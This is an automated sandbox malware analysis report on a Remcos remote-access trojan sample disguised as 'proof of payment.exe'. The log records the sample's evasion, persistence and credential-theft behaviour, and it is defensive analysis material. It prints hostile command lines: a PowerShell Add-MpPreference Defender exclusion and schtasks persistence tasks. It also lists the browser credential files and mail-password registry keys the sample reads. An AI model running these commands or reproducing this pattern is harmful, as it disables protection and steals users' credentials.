                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CB50
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h] 7_2_10004AB4
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004432B5 mov eax, dword ptr fs:[00000030h] 12_2_004432B5
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_1000724E GetProcessHeap,7_2_1000724E
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10002639
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_10002B1C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_004349F9
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00434B47 SetUnhandledExceptionFilter,12_2_00434B47
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB22
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00434FDC
                    Source: C:\Users\user\Desktop\proof of payment.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Memory written: C:\Users\user\AppData\Roaming\NvbYSEq.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\proof of payment.exe | Section loaded: NULL target: C:\Users\user\Desktop\proof of payment.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_004120F7
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: 12_2_00419627 mouse_event,12_2_00419627
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe"
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                    Source: C:\Users\user\Desktop\proof of payment.exe | Process created: C:\Users\user\Desktop\proof of payment.exe "C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Process created: C:\Users\user\AppData\Roaming\NvbYSEq.exe "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerYW\
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerb
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerYW\20
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerYW\2
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerr|
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerYW\j
                    Source: proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerA-PC
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerYW\$
                    Source: proof of payment.exe, 00000007.00000002.3915851761.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, proof of payment.exe, 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.dr | Binary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\proof of payment.exe | Code function: 7_2_10002933 cpuid 7_2_10002933
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: EnumSystemLocalesW,12_2_00452036
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_004520C3
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoW,12_2_00452313
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: EnumSystemLocalesW,12_2_00448404
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_0045243C
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoW,12_2_00452543
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452610
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoA,12_2_0040F8D1
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: GetLocaleInfoW,12_2_004488ED
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451CD8
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: EnumSystemLocalesW,12_2_00451F50
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: EnumSystemLocalesW,12_2_00451F9B
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Users\user\Desktop\proof of payment.exe VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Users\user\AppData\Roaming\NvbYSEq.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\proof of payment.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 7_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_10002264
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_0041B60D GetUserNameW,12_2_0041B60D
                    Source: C:\Users\user\AppData\Roaming\NvbYSEq.exeCode function: 12_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_00449190
                    Source: C:\Users\user\Desktop\proof of payment.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                    Source: C:\Users\user\Desktop\proof of payment.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.proof of payment.exe.5130000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.5130000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 12_2_0040BA12
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 12_2_0040BB30
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: \key3.db 12_2_0040BB30
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\proof of payment.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\proof of payment.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\proof of payment.exe | Code function: ESMTPPassword 17_2_004033F0
Source: C:\Users\user\Desktop\proof of payment.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 17_2_00402DB3
Source: C:\Users\user\Desktop\proof of payment.exe | Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 17_2_00402DB3
Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 4600, type: MEMORYSTR

                    Remote Access Functionality

Source: C:\Users\user\Desktop\proof of payment.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-F9KCYW
Source: Yara match | File source: 0.2.proof of payment.exe.5130000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.5130000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 12.2.NvbYSEq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.37dfc00.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.NvbYSEq.exe.3858820.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.3917800.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.proof of payment.exe.389ebe0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 2228, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: proof of payment.exe PID: 3640, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 4984, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: NvbYSEq.exe PID: 6596, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\NvbYSEq.exe | Code function: cmd.exe 12_2_0040569A
MITRE ATT&CK Matrix (techniques listed per tactic column; a number before a technique name is the count shown in the original matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
